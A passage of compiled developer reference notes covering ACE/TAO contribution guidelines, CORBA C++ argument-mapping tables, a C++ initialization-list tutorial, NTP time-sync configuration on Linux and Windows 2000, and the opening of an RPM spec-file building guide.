<tab> * dir/file.ext [(methods)]: description...

If you have a number of files, the names should be on separate lines. In this case, it's also ok to start the description on a new line indented to "dir."

3. Commit your change using a message of this form:

ChangeLogTag: Thu Jul 22 09:55:10 UTC 1999 David L. Levine <[email protected]>

4. If the change is in response to a request by someone else:
   1. Make sure that person is acknowledged in ACE_wrappers/THANKS, and
   2. Respond to that person.

Never add copyrighted, confidential, or otherwise restricted code to the ACE or TAO distributions without reviewing the situation with DOC management (i.e. Doug Schmidt). You will also most likely need to get written permission from the owner. The particular language and form needed will be relayed to you after discussing it with DOC management.

SVN Usage Guidelines

Always make sure that a change builds and executes correctly on at least one platform before checking it into the SVN repository. All changes must be tested with g++ before committing. That means you may need to test on at least two platforms.

Script Guidelines

In general, it's best to write scripts in Perl. It's OK to use Bourne shell. Never, never, never use csh, ksh, bash, or any other kind of shell.

Follow the Perl style guide as closely as possible. Run man perlstyle to view it.

Don't specify a hard-coded path to Perl itself. Use the following code at the top of the script to pick up perl from the user's PATH:

eval '(exit $?0)' && eval 'exec perl -S $0 ${1+"$@"}'
    & eval 'exec perl -S $0 $argv:q'
    if 0;

Never, never, never start the first line of a script with "#", unless the first line is "#! /bin/sh". With just "#", [t]csh users will spawn a new shell. That will cause their .[t]cshrc to be processed, possibly clobbering a necessary part of their environment.

If your Perl script relies on features only available in newer versions of Perl, include a statement similar to the following:

require 5.003;


Don't depend on . being in the user's path. If the script spawns another executable that is supposed to be in the current directory, be sure to prefix its filename with ./.

Software Engineering Guidelines

Advise: Keep other developers informed of problems and progress.

Authorize: We have contractual obligations not to unilaterally change interfaces. If you need to change or remove an interface, get an OK.

Minimize risk: Test all changes. Solicit review of changes.

Revise only when necessary: Every change has risk, so avoid making any change unless there is a good reason for it.

Normalize: Factor out commonality. For example, maintain a data value in only one place.

Synthesize: Build stubs and scaffolding early to simulate the complete system. Maintain a checked-in version of the system that cleanly builds and tests at all times.

Be available: Breaking compilation on one platform or another should be avoided (see above), but it is bound to happen when so many platforms are in use. Be available after making a change; if you won't be available for at least 48 hours after the change is made, then don't make it!

ACE Design Rules

Last modified: Wed Nov 23 11:00:44 CST 2005



CORBA programming: C++ type mapping for argument passing (C++ /CORBA)

Argument type mappings are discussed in this topic and summarized in the two tables below. For the rules that must be observed when passing parameters (in, inout, out, or return value) to a CORBA object implementation, see Argument passing considerations for C++ bindings.

For primitive types and enumerations, the type mapping is straightforward. For in parameters and return values the type mapping is the C++ type representation (abbreviated as "T" in the text that follows) of the IDL specified type. For inout and out parameters the type mapping is a reference to the C++ type representation (abbreviated as "T&" in the text that follows).

For object references, the type mapping uses _ptr for in parameters and return values and _ptr& for inout and out parameters. That is, for a declared interface A, an object reference parameter is passed as type A_ptr or A_ptr&. The conversion functions on the _var type permit the client (caller) the option of using the _var type rather than the _ptr for object reference parameters. Using the _var type may have an advantage in that it relieves the client (caller) of the responsibility of deallocating a returned object reference (out parameter or return value) between successive calls. This is because the assignment operator of a _ptr to a _var automatically releases the embedded reference.

The type mapping of parameters for aggregate types (also referred to as complex types) is complicated by when and how the parameter memory is allocated and deallocated. Mapping in parameters is straightforward because the parameter storage is caller-allocated and read-only. For an aggregate IDL type t with a C++ type representation of T, the in parameter mapping is const T&. The mapping of out and inout parameters is slightly more complex. To preserve the client's capability to stack-allocate fixed-length types, OMG has defined the mappings for fixed-length and variable-length aggregates differently. The inout and out mapping of an aggregate type represented in C++ as T is T& for fixed-length aggregates and T*& for variable-length aggregates.


Basic argument and result passing

For an aggregate type represented by the C++ type T, the T_var type is also defined. The conversion operations on each T_var type allow the client (caller) to use the T_var type directly for any directionality, instead of using the required form of the T type (T, T& or T*&). The emitted bindings define the operation signatures in terms of the parameter passing modes shown in the table T_var argument and result passing, and the T_var types provide the necessary conversion operators to allow them to be passed directly.

T_var argument and result passing

For parameters that are passed or returned as a pointer type (T*) or reference to pointer (T*&), the programmer should not pass or return a null pointer. This cannot be enforced by the bindings.

Data Type          In               Inout        Out             Return
short              short            short&       short&          short
long               long             long&        long&           long
unsigned short     ushort           ushort&      ushort&         ushort
unsigned long      ulong            ulong&       ulong&          ulong
float              float            float&       float&          float
double             double           double&      double&         double
boolean            boolean          boolean&     boolean&        boolean
char               char             char&        char&           char
wchar              wchar            wchar&       wchar&          wchar
octet              octet            octet&       octet&          octet
enum               enum             enum&        enum&           enum
object reference   objref_ptr       objref_ptr&  objref_ptr&     objref_ptr
struct, fixed      const struct&    struct&      struct&         struct
struct, variable   const struct&    struct&      struct*&        struct*
union, fixed       const union&     union&       union&          union
union, variable    const union&     union&       union*&         union*
string             const char*      char*&       char*&          char*
wstring            const wchar*     wchar*&      wchar*&         wchar*
sequence           const sequence&  sequence&    sequence*&      sequence*
array, fixed       const array      array        array           array slice*
array, variable    const array      array        array slice*&   array slice*
any                const any&       any&         any*&           any*

Data Type             In                   Inout          Out            Return
object reference_var  const objref_var&    objref_var&    objref_var&    objref_var
struct_var            const struct_var&    struct_var&    struct_var&    struct_var
union_var             const union_var&     union_var&     union_var&     union_var
string_var            const string_var&    string_var&    string_var&    string_var
sequence_var          const sequence_var&  sequence_var&  sequence_var&  sequence_var
array_var             const array_var&     array_var&     array_var&     array_var


Understanding Initialization Lists in C++ (C++)
http://www.cprogramming.com/tutorial/initialization-lists-c++.html

Understanding the Start of an Object's Lifetime

In C++, whenever an object of a class is created, its constructor is called. But that's not all--its parent class constructor is called, as are the constructors for all objects that belong to the class. By default, the constructors invoked are the default ("no-argument") constructors. Moreover, all of these constructors are called before the class's own constructor is called.

For instance, take the following code:

#include <iostream>

class Foo
{
public:
  Foo() { std::cout << "Foo's constructor" << std::endl; }
};

class Bar : public Foo
{
public:
  Bar() { std::cout << "Bar's constructor" << std::endl; }
};

int main()
{
  // a lovely elephant ;)
  Bar bar;
}

The object bar is constructed in two stages: first, the Foo constructor is invoked and then the Bar constructor is invoked. The output of the above program will be to indicate that Foo's constructor is called first, followed by Bar's constructor.

Why do this? There are a few reasons. First, each class should initialize only the things that belong to it, not things that belong to other classes. So a child class should hand off the work of constructing the portion that belongs to the parent class. Second, the child class may depend on the parent's fields when initializing its own fields; therefore, the parent's constructor needs to be called before the child class's constructor runs. In addition, all of the objects that belong to the class should be initialized so that the constructor can use them if it needs to.

But what if you have a parent class that needs to take arguments to its constructor? This is where initialization lists come into play. An initialization list immediately follows the constructor's signature, separated by a colon:

class Foo : public parent_class
{
  Foo() : parent_class( "arg" ) // sample initialization list
  {
    // you must include a body, even if it's merely empty
  }
};

Note that to call a particular parent class constructor, you just need to use the name of the class (it's as though you're making a function call to the constructor).

For instance, in our above example, if Foo's constructor took an integer as an argument, we could do this:

#include <iostream>

class Foo
{
public:
  Foo( int x )
  { std::cout << "Foo's constructor called with " << x << std::endl; }
};

class Bar : public Foo
{
public:
  Bar() : Foo( 10 ) // construct the Foo part of Bar
  { std::cout << "Bar's constructor" << std::endl; }
};

int main()
{
  Bar stool;
}

Using Initialization Lists to Initialize Fields

In addition to letting you pick which constructor of the parent class gets called, the initialization list also lets you specify which constructor gets called for the objects that are fields of the class. For instance, if you have a string inside your class:

class Qux
{
public:
  Qux() : _foo( "initialize foo to this!" )
  { }
  // This is nearly equivalent to
  // Qux() { _foo = "initialize foo to this!"; }
  // but without the extra call to construct an empty string

private:
  std::string _foo;
};

Here, the constructor is invoked by giving the name of the object to be constructed rather than the name of the class (as in the case of using initialization lists to call the parent class's constructor).

If you have multiple fields of a class, then the names of the objects being initialized should appear in the order they are declared in the class (and after any parent class constructor call):

class Baz
{
public:
  Baz() : _foo( "initialize foo first" ), _bar( "then bar" )
  { }

private:
  std::string _foo;
  std::string _bar;
};

Initialization Lists and Scope Issues

If you have a field of your class that has the same name as an argument to your constructor, then the initialization list "does the right thing." For instance,

class Baz
{
public:
  Baz( std::string foo ) : foo( foo )
  { }

private:
  std::string foo;
};

is roughly equivalent to

class Baz
{
public:
  Baz( std::string foo )
  { this->foo = foo; }

private:
  std::string foo;
};

That is, the compiler knows which foo belongs to the object, and which foo belongs to the function.

Initialization Lists and Primitive Types

It turns out that initialization lists work to initialize both user-defined types (objects of classes) and primitive types (e.g., int). When the field is a primitive type, giving it an argument is equivalent to assignment. For instance,

class Quux
{
public:
  Quux() : _my_int( 5 ) // sets _my_int to 5
  { }

private:
  int _my_int;
};

This behavior allows you to specify templates where the templated type can be either a class or a primitive type (otherwise, you would have to have different ways of handling initializing fields of the templated type for the cases of classes and primitive types).

template <typename T>
class my_template
{
public:
  // works as long as T has a copy constructor
  my_template( T bar ) : _bar( bar )
  { }

private:
  T _bar;
};

Initialization Lists and Const Fields

Using initialization lists to initialize fields is not always necessary (although it is probably more convenient than other approaches). But it is necessary for const fields. If you have a const field, then it can be initialized only once, so it must be initialized in the initialization list:

class const_field
{
public:
  const_field() : _constant( 1 )
  { }
  // this is an error:
  // const_field() { _constant = 1; }

private:
  const int _constant;
};


When Else Do You Need Initialization Lists?

No Default Constructor

If you have a field that has no default constructor (or a parent class with no default constructor), you must specify which constructor you wish to use.

References

If you have a field that is a reference, you also must initialize it in the initialization list; since a reference can be bound only once, it must be initialized at the point of construction.

Initialization Lists and Exceptions

Since constructors can throw exceptions, it's possible that you might want to be able to handle exceptions that are thrown by constructors invoked as part of the initialization list.

First, you should know that even if you catch the exception, it will get rethrown, because it cannot be guaranteed that your object is in a valid state when one of its fields (or parts of its parent class) couldn't be initialized. That said, one reason you'd want to catch an exception here is that there's some kind of translation of error messages that needs to be done.

The syntax for catching an exception in an initialization list is somewhat awkward: the 'try' goes right before the colon, and the catch goes after the body of the function:

class Foo
{
  Foo()
  try
    : _str( "text of string" )
  { }
  catch ( ... )
  {
    std::cerr << "Couldn't create _str";
    // now, the exception is rethrown as if we'd written
    // "throw;" here
  }
};

Initialization Lists: Summary

Before the body of the constructor is run, all of the constructors for its parent class and then for its fields are invoked. By default, the no-argument constructors are invoked. Initialization lists allow you to choose which constructor is called and what arguments that constructor receives.

If you have a reference or a const field, or if one of the classes used does not have a default constructor, you must use an initialization list.


Time Synchronization with NTP (Linux)
http://www.akadia.com/services/ntp_synchronize.html

Overview

NTP (Network Time Protocol) provides accurate and synchronized time across the Internet. This introductory article will try to show you how to use NTP to control and synchronize your system clock.

First approach

NTP is organised in a hierarchical client-server model. At the top of this hierarchy there are a small number of machines known as reference clocks. A reference clock is known as stratum 0 and is typically a cesium clock or a Global Positioning System (GPS) receiver that obtains time from satellites. Attached to these machines are the so-called stratum 1 servers (that is, stratum 0 clients), which are the top-level time servers available to the Internet; that is, they are the best NTP servers available.

Note: in NTP lingo, the measure of synchronization distance is termed the stratum: the number of steps that a system lies from a primary time source.

Following this hierarchy, the next level in the structure is the stratum 2 servers, which in turn are the clients for stratum 1 servers. The lowest level of the hierarchy is made up of stratum 16 servers. Generally speaking, every server synchronized with a stratum n server is termed as being at stratum n+1 level. So, there are a few stratum 1 servers which are referenced by stratum 2 servers, which in turn are referenced by stratum 3 servers, which are referenced by stratum 4, and so on.

NTP servers operating in the same stratum may be associated with others on a peer-to-peer basis, so they may decide which has the higher quality of time and then synchronize to the most accurate.

In addition to the client-server model and the peer-to-peer model, a server may broadcast time to broadcast or multicast IP addresses, and clients may be configured to synchronize to these broadcast time signals.

So, at this point we know that NTP clients can operate with NTP servers in three ways:

o on a client-server basis
o in a peer-to-peer mode
o sending the time using broadcast/multicast

How does it work

Whenever ntpd starts, it checks its configuration file (/etc/ntp.conf) to determine synchronization sources, authentication options, monitoring options, access control and other operating options. It also checks the frequency file (/etc/ntp/drift) that contains the latest estimate of clock frequency error. If specified, it will also look for a file containing the authentication keys (/etc/ntp/keys).

Note that the path and/or name of these configuration files may vary in your system. Check the -c command line option.


Once the NTP daemon is up and running, it will operate by exchanging packets (time and sanity check exchanges) with its configured servers at poll intervals and its behaviour will depend on the delay between the local time and its reference servers. Basically, the process starts when the NTP client sends a packet containing its timestamp to a server. When the server receives such a packet, it will in turn store its own timestamp and a transmit timestamp into the packet and send it back to the client. When the client receives the packet it will log its receipt time in order to estimate the travelling time of the packet.

The packet exchange takes place until an NTP server is accepted as a synchronization source, which takes about five minutes. The NTP daemon tries to adjust the clock in small steps and will continue until the client gets the accurate time. If the offset between the server and the client is too large, the daemon will terminate and you will need to adjust the time manually and start the daemon again.

Sample ntp.conf configuration file

     server 134.214.100.6     server swisstime.ee.ethz.ch

     peer 192.168.100.125     peer 192.168.100.126     peer 192.168.100.127

     driftfile /etc/ntp/drift     #multicastclient  # listen on default 224.0.1.1     #broadcastdelay  0.008

     authenticate no

     #keys           /etc/ntp/keys     #trustedkey     65535     #requestkey     65535     #controlkey     65535

     # by default ignore all ntp packets     restrict 0.0.0.0 mask 0.0.0.0 ignore

     # allow localhost     restrict 127.0.0.1 mask 255.255.255.255

     # accept packets from...     restrict 192.168.100.125 mask 255.255.255.255     restrict 192.168.100.126 mask 255.255.255.255     restrict 192.168.100.127 mask 255.255.255.255 

Take a look at references below to understand the configuration options.

References

NTP homepage
ntpd
Network time protocol (version 3) specification
Public NTP Time Servers

NTP Basics


NTP stands for Network Time Protocol, and it is an Internet protocol used to synchronize the clocks of computers to some time reference. NTP is an Internet standard protocol originally developed by Professor David L. Mills at the University of Delaware. 

SNTP (Simple Network Time Protocol) is basically also NTP, but lacks some internal algorithms that are not needed for all types of servers.

Time should be synchronized

Time usually just advances. If you have communicating programs running on different computers, time should still advance even if you switch from one computer to another. Obviously, if one system is ahead of the others, the others are behind that particular one. From the perspective of an external observer, switching between these systems would cause time to jump forward and back, a non-desirable effect.

As a consequence, isolated networks may run their own wrong time, but as soon as you connect to the Internet, the effects will be visible. Just imagine some email message that arrived five minutes before it was sent, and a reply that arrived two minutes before the message was sent.

Basic features of NTP

To operate, NTP needs a reference clock that defines the true time. All clocks are set towards that true time. (It will not just make all systems agree on some time, but will make them agree upon the true time as defined by some standard.)

NTP uses UTC as reference time 

NTP is a fault-tolerant protocol that will automatically select the best of several available time sources to synchronize to. Multiple candidates can be combined to minimize the accumulated error. Temporarily or permanently insane time sources will be detected and avoided. 

NTP is highly scalable: A synchronization network may consist of several reference clocks. Each node of such a network can exchange time information either bidirectional or unidirectional. Propagating time from one node to another forms a hierarchical graph with reference clocks at the top. 

Having several time sources available, NTP can select the best candidates to build its estimate of the current time. The protocol is highly accurate, using a resolution of less than a nanosecond (about 2^-32 seconds). (The popular protocol used by rdate, defined in [RFC 868], only uses a resolution of one second.)

Even when a network connection is temporarily unavailable, NTP can use measurements from the past to estimate current time and error.

UTC (Universal Time Coordinated)

UTC (Universal Time Coordinated, Temps Universel Coordonné) is an official standard for the current time. UTC evolved from the former GMT (Greenwich Mean Time) that once was used to set the clocks on ships before they left for a long journey. Later, GMT was adopted as the world's standard time. One of the reasons GMT was replaced as the official standard time was that it was based on mean solar time; newer methods of time measurement showed that mean solar time varies considerably. The following list explains the main components of UTC:


Universal means that the time can be used everywhere in the world, meaning that it is independent from time zones (i.e. it's not local time). To convert UTC to local time, one would have to add or subtract the local time zone offset.

Coordinated means that several institutions contribute their estimate of the current time, and UTC is built by combining these estimates.

NTP on Unix and Windows 2000

In this example we show how to synchronize your Linux, Solaris and Windows 2000 Server (Primary Domain Controller) machines with the public NTP time server swisstime.ethz.ch.

Public NTP Server in Switzerland

swisstime.ethz.ch (129.132.2.21)
Location: Integrated Systems Laboratory, Swiss Fed. Inst. of Technology, CH 8092 Zurich, Switzerland
Geographic Coordinates: 47:23N, 8:32E
Synchronization: NTP primary (DCF77 clock), Sun-4/SunOS 4.1.4
Service Area: Switzerland/Europe
Access Policy: open access
Contact: Christoph Wicki ([email protected])

Configuration on Unix


Unix Workstation as NTP Client

The NTP client program ntpdate sets the system clock once. As real clocks drift, you need periodic corrections. Basically you can run ntpdate in a cron job hourly or daily, but your machine won't be an NTP server then.

Crontab entry to update the system clock once a day

0 2 * * * /usr/sbin/ntpdate -s -b -p 8 -u 129.132.2.21

-b 

Force the time to be stepped using the settimeofday() system call, rather than slewed (default) using the adjtime() system call. This option should be used when called from a startup file at boot time.

-p samples

Specify the number of samples to be acquired from each server as the integer samples, with values from 1 to 8 inclusive. The default is 4.

-s

Divert logging output from the standard output (default) to the system syslog facility. This is designed primarily for convenience of cron scripts.

-u

Direct ntpdate to use an unprivileged port for outgoing packets. This is most useful when behind a firewall that blocks incoming traffic to privileged ports, and you want to synchronise with hosts beyond the firewall. Note that the -d option always uses unprivileged ports.

Unix Workstation as NTP Server

First of all you have to download the NTP sources from www.ntp.org. On RedHat Linux 7.0 / 7.1 the NTP server ntpd is already included in the distribution.

The NTP server ntpd will learn and remember the clock drift and it will correct it autonomously, even if there is no reachable server. Therefore large clock steps can be avoided while the machine is synchronized to some reference clock. In addition ntpd will maintain error estimates and statistics, and finally it can offer NTP service for other machines.

Look at the Startup Script in /etc/rc.d/init.d/ntpd

start() {
        # Adjust time to make life easy for ntpd
        if [ -f /etc/ntp/step-tickers ]; then
             echo -n $"Synchronizing with time server: "
             /usr/sbin/ntpdate -s -b -p 8 -u \
             `/bin/sed -e 's/#.*//' /etc/ntp/step-tickers`
             success
             echo
        fi
        # Start daemons.
        echo -n $"Starting $prog: "
        daemon ntpd
        RETVAL=$?
        echo
        [ $RETVAL -eq 0 ] && touch /var/lock/subsys/ntpd
        return $RETVAL
}

Add swisstime.ethz.ch (or other NTP servers) to /etc/ntp/step-tickers

129.132.2.21

Edit the configuration file /etc/ntp.conf

server 127.127.1.0   # local clock
server 129.132.2.21  # swisstime.ethz.ch (stratum 1)
driftfile /etc/ntp/drift
multicastclient      # listen on default 224.0.1.1
broadcastdelay 0.008

Start NTP Server and check /var/log/messages

# /etc/rc.d/init.d/ntpd start

Troubleshooting

One of the quickest commands to verify that ntpd is still up and running as desired is ntpq -p. That command will show all configured and used peers together with a summary of their state and performance data.

# ntpq -p

     remote           refid    st t when poll reach   delay   offset  jitter
=============================================================================
 LOCAL(0)        LOCAL(0)       3 l    9   64   377    0.000    0.000   0.000
*swisstime.ethz. .DCFa.         1 u   17   64   377   25.088  -10.040   1.071

This obtains a current list of the server's peers, along with a summary of each peer's state. The summary information includes the address of the remote peer, the reference ID (0.0.0.0 if this is unknown), the stratum of the remote peer, the type of the peer (local, unicast, multicast or broadcast), when the last packet was received, the polling interval in seconds, the reachability register in octal, and the current estimated delay, offset and dispersion of the peer, all in milliseconds.

# ntpq -c pee swisstime.ethz.ch

     remote           refid    st t when poll reach    delay   offset  jitter
=============================================================================
*GENERIC(0)      .DCFa.         0 l   14   16   377    0.000    0.126   0.170
 LOCAL(0)        LOCAL(0)       6 l   13   64   377    0.000    0.000  10.010
 sns2-tss2.unige lantime        2 u  323 1024   377   11.000    0.014   1.770
+nz11.rz.uni-kar .DCF.          1 u   40   64   376  353.290   18.088  17.120
xjane.planNET.de .DCFa.         1 u   80  256   377  125.050  -38.018   0.210
+sombrero.cs.tu- .GPS.          1 u   49   64   377   36.070    1.159   0.790

# ntpdc


ntpdc> peers

Be sure that there is an entry for the swisstime.ethz.ch server, and that there is an entry for your local net. The "st" (stratum) column for the time servers should be "1" or "2", indicating that they are stratum-1/2 servers: stratum-2 servers obtain their time from stratum-1 servers, which are directly connected to external time reference sources. If the stratum for any server is "16", then that server is not synchronizing successfully.

     remote           local           st poll reach    delay    offset     disp
================================================================================
 LOCAL(0)        127.0.0.1            3   64   377  0.00000  0.000000  0.00095
=cosmos.hsz.akad 5.0.0.0             16   64     0  0.00000  0.000000  0.00000
*swisstime.ethz. 192.168.138.29       1  128   377  0.02658 -0.001197  0.00215

Configuration on Windows 2000 Workstation

Windows 2000 (Win2K) uses a time service, known as the Windows Time Synchronization Service (W32Time), to ensure that all Win2K computers on your network use a common time. The W32Time service is a fully compliant implementation of the Simple Network Time Protocol (SNTP) as detailed in IETF RFC 1769. SNTP uses UDP port 123 by default. If you want to synchronize your time server with an SNTP server on the Internet, make sure that port is available.

Select an NTP server using

net time /setsntp:swisstime.ethz.ch

Start the W32time service with

net start W32Time

You can also set the start option of the Windows Time Synchronization Service (W32Time) to Automatic, so the service will start when Windows 2000 starts.

Set the following registry entries for the W32Time service

The registry values are located in the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters

AvoidTimeSyncOnWan : REG_DWORD (optional)
Prevents the computer from synchronizing with a computer that is in another site.
0 = the site of the time source is ignored [default]
1 = the computer does not synchronize with a time source that is in a different site

GetDcBackoffMaxTimes : REG_DWORD (optional)
The maximum number of times to double the backoff interval when successive attempts to find a domain controller do not succeed. An event is logged every time a wait of the maximum length occurs.
0 = the wait between successive attempts is always the minimum and no event is logged
7 = [default]

GetDcBackoffMinutes : REG_DWORD (optional)
The initial number of minutes to wait before looking for a domain controller if the last attempt did not succeed.
15 = [default]

LocalNTP : REG_DWORD
Used to start the SNTP server.
0 = do not start the SNTP server unless this computer is a domain controller [default]
1 = always start the SNTP server

NtpServer : REG_SZ (optional)
Used to manually configure the time source. Set this to the DNS name or IP address of the NTP server to synchronize from (e.g. swisstime.ethz.ch). You can modify this from the command line by using the net time command. The value is blank by default.

Period : REG_DWORD or REG_SZ
Used to control how often the time service synchronizes. If a string value is specified, it must be one of the special values listed below.
0 = once a day
65535, "BiDaily" = once every 2 days
65534, "Tridaily" = once every 3 days
65533, "Weekly" = once every week (7 days)
65532, "SpecialSkew" = once every 45 minutes until 3 good synchronizations occur, then once every 8 hours (3 per day) [default]
65531, "DailySpecialSkew" = once every 45 minutes until 1 good synchronization occurs, then once every day
freq = freq times per day

ReliableTimeSource : REG_DWORD (optional)
Used to indicate that this computer has reliable time.
0 = do not mark this computer as having reliable time [default]
1 = mark this computer as having reliable time (this is only useful on a domain controller)

Type : REG_SZ
Used to control how a computer synchronizes.
Nt5DS = synchronize to domain hierarchy [default]
NTP = synchronize to manually configured source
NoSync = do not synchronize time

The Nt5DS setting may not use a manually configured source.

The Adj and msSkewPerDay values are used to preserve information about the computer's clock between restarts. Do not manually edit these values.
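Putting the entries above together, a manually configured SNTP client could be described by an exported .reg fragment along these lines (a sketch for illustration only; the values are examples, and Period 0 means once a day as listed above):

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters]
"Type"="NTP"
"NtpServer"="swisstime.ethz.ch"
"Period"=dword:00000000
```

After importing such a fragment, restart the service (net stop W32Time, then net start W32Time) so the new parameters take effect.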

More Information

For further information about NTP in Windows 2000 see

http://support.microsoft.com/support/kb/articles/q224/7/99.asp
http://support.microsoft.com/support/kb/articles/q216/7/34.asp
http://support.microsoft.com/support/kb/articles/q223/1/84.asp
http://support.microsoft.com/support/kb/articles/q120/9/44.asp
http://support.microsoft.com/support/kb/articles/Q232/2/55.asp
http://labmice.techtarget.com/windows2000/timesynch.htm

For further information about NTP see

http://www.eecis.udel.edu/~ntp/

RPM package building guide (Linux)
Taken from: http://rpm.rutgers.edu/guide.html

Introduction to rpm package building

Rpm packages are usually built with a "spec file," which is a collection of text and shell scripts that build, install and describe a software program. Here is a typical spec file:

Summary: Rc shell from Plan 9
Name: rc
Version: 1.6
Release: 1
Group: System Environment/Shells
Copyright: BSD-type
Source: rc-%{version}.tar.gz
BuildRoot: %{_tmppath}/%{name}-root
Requires: readline
BuildRequires: readline-devel

%description
rc is a command interpreter and programming language similar to sh(1).
It is based on the AT&T Plan 9 shell of the same name. The shell
offers a C-like syntax (much more so than the C shell), and a powerful
mechanism for manipulating variables. It is reasonably small and
reasonably fast, especially when compared to contemporary shells. Its
use is intended to be interactive, but the language lends itself well
to scripts.

[from the man page]

%prep
%setup -q

%build
LD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \
LDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure --with-history \
--with-readline
make

%install
rm -rf $RPM_BUILD_ROOT
mkdir -p $RPM_BUILD_ROOT/usr/local
make install prefix=$RPM_BUILD_ROOT/usr/local sysconfdir=$RPM_BUILD_ROOT/etc

%clean
rm -rf $RPM_BUILD_ROOT

%files
%defattr(-,bin,bin)
%doc COPYING AUTHORS EXAMPLES README RELDATE ChangeLog
/usr/local/bin/rc
/usr/local/bin/-
/usr/local/bin/--
/usr/local/bin/-p
/usr/local/bin/--p
/usr/local/man/man1/rc.1
/usr/local/man/man1/history.1

The spec file is split into several sections, which will be examined individually.

In order to write spec files, it is important to understand rpm's dependency checking, macros and directory structure. When you build a package, rpm creates a list of the shared libraries that it includes and a list of the shared libraries to which it is linked. RPM records the shared libraries that the package provides, plus the package name itself and anything manually specified in the spec file, together with version information. Similarly, RPM records the required shared libraries and manually specified requires. In rc, readline, libc.so.1, libcurses.so.1, libdl.so.1 and libreadline.so.4 are required, and rc (version 1.6) is provided. Readline and libreadline.so.4 are both provided by the readline package; the rest are provided by the operating system.

"Build requires" -- packages required at build time -- can be specified in a spec file. When it is built, rc needs readline-devel, which provides the header files for the readline library.

Rpm has a simple macro system. Macros can be defined like so:

%define foo bar
%{foo}

is preprocessed to become "bar". Rpm has logical constructs: %if/%else/%endif, %ifos, and %ifarch (cf. openssl.spec).
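As a sketch of how those logical constructs look in practice (the macro names and values below are invented for illustration, not taken from any real spec):

```
%define shellsdir /usr/local/shells

%ifarch sparc sparcv9
%define extra_cflags -DSPARC
%else
%define extra_cflags -DGENERIC
%endif

# later in the spec, %{shellsdir} and %{extra_cflags}
# expand to the values chosen above
```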

Finally, rpm has a system of directories for package building:

prefix/src/redhat/RPMS/sparc
prefix/src/redhat/RPMS/sparc64
prefix/src/redhat/RPMS/sparcv9
. . .
prefix/src/redhat/SRPMS
prefix/src/redhat/SOURCES ($RPM_SOURCE_DIR)
prefix/src/redhat/BUILD ($RPM_BUILD_DIR)
prefix/src/redhat/SPECS

RPM expects to find your source in SOURCES; it will unpack and compile the source code in BUILD. RPM expects to find the files that the package will install in $RPM_BUILD_ROOT, which rc has set to %{_tmppath}/rc-root ("%{_tmppath}" is a macro set by rpm which expands to the name of a directory for temporary files).

The Preamble

The preamble from rc.spec is:

Summary: Rc shell from Plan 9
Name: rc
Version: 1.6
Release: 1
Group: System Environment/Shells
Copyright: BSD-type
Source: rc-%{version}.tar.gz
BuildRoot: %{_tmppath}/%{name}-root
Requires: readline

It describes the package name, version, etc. Name, Version, Release, Group, Copyright (or License), and Summary are required. Other fields, such as URL and Packager, are optional. Name, Version and Release define macros called %{name}, %{version} and %{release} respectively.

Generally, source filenames match the expansion of "%{name}-%{version}.tar.gz". The %{version} macro makes maintaining the package much easier; its use is highly recommended. If the source field has a URL, rpm automatically downloads the source and places it in $RPM_SOURCE_DIR. You can specify multiple sources with Source0, Source1, etc.

The %description

This section is parsed separately from the preamble, but can be thought of as another field. Generally, one can steal the introduction from a README or man page to get a good description.

The %prep section

%prep
%setup -q

The %prep section is where the source is prepared, usually in $RPM_BUILD_DIR. Rpm provides the %setup and %patch primitives which automatically untar and patch your source. %setup expects the tarball to unpack into a directory called %{name}-%{version}; otherwise you have to pass it the -n switch, which names the build directory. The important %setup switches are:

-n <name> (name of build directory)
-c (creates top-level build directory)
-D (don't delete top-level build directory)
-T (don't unpack Source0)
-a <n> (unpack Source number n, after cd'ing to build directory)
-b <n> (unpack Source number n, before cd'ing to build directory)
-q (unpack silently)

To unpack several sources into the same directory, you need to have something like the following in %prep:

%setup -q
%setup -D -T -a 1
%setup -D -T -a 2

That unpacks source 0, then cds into %{name}-%{version} and unpacks sources 1 and 2. As for patches, you have the following switches:

-P <n> (use Patch number n)
-p, -b, -E (see patch(1))
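A sketch of how patches are typically declared and applied in a spec file (the patch file names here are hypothetical, not from the rc package):

```
Patch0: rc-1.6-makefile.patch
Patch1: rc-1.6-solaris.patch

%prep
%setup -q
%patch0 -p1
%patch1 -p1
```

Each PatchN tag names a file in $RPM_SOURCE_DIR, and each %patchN line applies it inside the build directory with the given patch(1) options.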

While %prep appears to be all macros, don't be fooled -- %prep, %clean, %build, %install, %pre, %post, etc. are all shell scripts.

You might need to install GNU tar and put it on your PATH before Sun tar when building packages with extremely long filenames (the GNOME software in particular requires gnutar).

The %build section

%build
LD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \
LDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure --with-history \
--with-readline
make

The %build section is where the actual compiling takes place. Rpm has a %configure macro, which is broken by design (it takes the directories from prefix/lib/rpm/macros, so it might misplace your files; and it only works with GNU configure). With GNU configure, you probably want to configure and build the sources like so:

automake   # if you patched Makefile.am
autoconf   # if you patched configure.in
LD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \
LDFLAGS="-L/usr/local/lib -R/usr/local/lib" CPPFLAGS="-I/usr/local/include" \
./configure --prefix=/usr/local --sysconfdir=/etc
make

Unfortunately, GNU configure does not reliably use $LD and $LDFLAGS together -- sometimes it does, and sometimes it doesn't. It is more reliable to pass everything into configure (especially because it increases the chance that your specfile will work on someone else's machine). If you're compiling C++ for X, add CXX="g++ -fpermissive" (Sun's include files aren't ANSI C++).

As for imake (with Sun's cc, not gcc), try:

xmkmf -a
make CCOPTIONS="-I/usr/local/include" LINTOPTS="" \
 EXTRA_LDOPTIONS="-L/usr/local/lib -R/usr/local/lib"

Using imake and gcc is left as an exercise to the reader.

Don't specify the prefix as $RPM_BUILD_ROOT/usr/local; many programs hardcode file locations at the configure or make stage.

The %install section

%install
rm -rf $RPM_BUILD_ROOT
mkdir -p $RPM_BUILD_ROOT/usr/local
make install prefix=$RPM_BUILD_ROOT/usr/local sysconfdir=$RPM_BUILD_ROOT/etc

The %install section is where the files get "installed" into your build root. You can build rpms without a build root, but this practice is highly deprecated and insecure (more on this later). Always begin the %install section with something along the lines of

rm -rf $RPM_BUILD_ROOT
mkdir -p $RPM_BUILD_ROOT/usr/local

Sometimes, you can get away with just adding

